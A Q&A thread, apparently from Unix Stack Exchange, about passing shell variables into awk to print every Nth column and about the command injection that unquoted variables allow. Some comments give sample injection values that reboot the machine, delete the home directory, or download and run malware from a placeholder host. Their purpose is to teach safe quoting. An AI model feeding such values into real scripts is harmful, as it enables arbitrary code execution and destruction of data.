# Output every N column from input

Tags: shell-script, text-processing

I am trying to write a script to print every N columns of a file by giving the starting column, incremental value and file name as run time parameters.
Below is my script:

```
file=$1
st=$2
inc=$3

echo $file
echo $st
echo $inc

awk '{for (i = $st; i <= NF; i += $inc) printf ("%s%c", $i, i + $inc <= NF ? " " : "\n");}' $file
```

I am not able to get the result.
Could any one help me?
My  inputs can be like `script.sh file_name 1 4`

Thanks in advance.:-)

Answer (score 9):

Shell variables don't automagically become `awk` variables (also in `awk`, variables are expressed as `var`, not `$var` which is the `var`<sup>th</sup> field). If you want to pass shell variable to `awk`, a simple approach is to use the environment:

```
#! /bin/sh -
file=$1
ST=$2
INC=$3

export ST INC
awk '
  {
    sep = ""
    for (i = ENVIRON["ST"]; i <= NF; i += ENVIRON["INC"]) {
      printf "%c%s", sep, $i
      sep = OFS
    }
    printf "\n"
  }' < "$file"
```

Remember to quote your shell variables and that `awk` can't get arbitrary file names as argument (as it treats some of those with a `=` in them or one called `-` specially).

An alternative for passing variables to `awk` is to use `-v awkvar="$shellvar"` or `awkvar="$shellvar"` arguments after the awk script, but those can't be used for arbitrary strings as escape sequences are expanded in them (`\\` becomes `\` and `\n` becomes a newline for instance)  and with GNU `awk` 4.2 or above, [values that start with `@/` and end in `/` are treated specially](https://www.gnu.org/software/gawk/manual/gawk.html#Strong-Regexp-Constants) unless in POSIX mode.

```
awk -v st="$st" -v inc="$inc" '{for (i = st; i <= NF; i += inc)...}' < "$file"
```

or

```
awk  '{for (i = st; i <= NF; i += inc)...}' st="$st" inc="$inc" < "$file"
```

would be OK here as those variables are only meant to contain numbers (so no backslash).

Whatever you do, don't do:

```
awk 'for (i = '"$st"'; i <= NF; i += '"$inc"')...'
```

let alone

```
awk 'for (i = '$st'; i <= NF; i += '$inc')...'
```

that is have the shell expand the values of the `$st` and `$inc` variables in the code passed to `awk`, as that makes command injection vulnerabilities (for instance for values of `st` like `system("reboot")`).

Answer (score 3):

I have corrected your script so that now it works. There were two errors. (a) you have to pass shell variables to awk manually (this is done using `-v awk_var="$shell_var"` syntax) and (b) you should not use `$` for denoting a variable, `$` sign is used only for field position.

```
file=$1
st=$2
inc=$3

echo $file
echo $st
echo $inc

awk -v st="$st" -v inc="$inc" '{for (i = st; i <= NF; i += inc) printf ("%s%c", $i, i + inc <= NF ? " " : "\n");}' $file
```

Comment: `awk -v st=$st` is also a command injection vulnerability, for instance with values of `$st` like `x BEGIN{system("reboot")}`. That's one of the examples given at [Security implications of forgetting to quote a variable in bash/POSIX shells](//unix.stackexchange.com/a/171347)

Comment: Thank you for this valuable comment, Stephane. I changed the script according to your suggestion.

Comment: I suggest you read the linked Q&A. `echo $st` can also become an information disclosure and DoS vulnerability.

Comment: 1. I completely agree that the original script is not perfect and there are many things, which can be corrected. But my goal was to make as few changes as possible in order to make it work so that the author can learn something from my answer. 2. I am already reading this interesting "Q&A". I am an intelligent person and don't need the things to be repeated twice. 3. Passing "BEGIN{system("reboot")}" does nothing in my bash shell. I suggest you to test things before writing. 4. `echo` in the original script is for testing purposes and most people do not work for CIA or FBI.

Comment: True, but people may (and will) end up copy-pasting from your  answer which as written includes several instances of bad coding practice (granted, inherited from the question). In my answers I try to avoid bad coding practice. I wouldn't want finding code copy-pasted from my answers causing security vulnerabilities for instance.

Comment: I truely enjoy our discussion of your personal habits and preferences, but it would be more interesting if you could show a working example of rebooting the PC using the script above.

Comment: About your 3rd point, the problem is with `st='x BEGIN{system("reboot")}'; awk -v st=$st whatever` for instance (with the default value of $IFS in a bourne-like shell other than `zsh`). Again, that's in the linked Q&A.

Comment: This does work. Thanks again, really interesting. With the change to `st='x BEGIN{system("/sbin/reboot")}'` and from superuser only, but anyway, very interesting.

Comment: the _superuser_ part is not very relevant here (and some systems allow non-superusers to reboot provided it's from a locally logged session; I use `reboot` in examples as at worse it's not such a malicious command but shows the point), as it's the same kind of problem with `x BEGIN{system("rm\40-rf\40~")}` or a more common worm-like `x BEGIN{system("wget\40http://some/malware;perl\40./malware")}`. The point is it is _arbitrary_ code execution, the worst type of vulnerability you can imagine. But in the end, its about good coding practice: "quote your variables".

Comment: Your script does not work as it prints only numbers, not column content. Assuming it is a typo, I have fixed that for you. Feel free to revert if you think I did wrong (which is possible since, at the time of writing, there are 3 up-votes and no down-votes). BTW: not upvoting myself because of the lack of quoting stressed by Stéphane. I understand your point, JS, and agree that it's a god thing to preserve the original code, but quoting doesn't really alter it and it is a critical good practice that everyone should embrace.

Comment: @JohnSmith (b) you should not use $ for denoting a variable, $ sign is used only for field position. I am not able to get this point. I have used $ to represent value stored in the variable.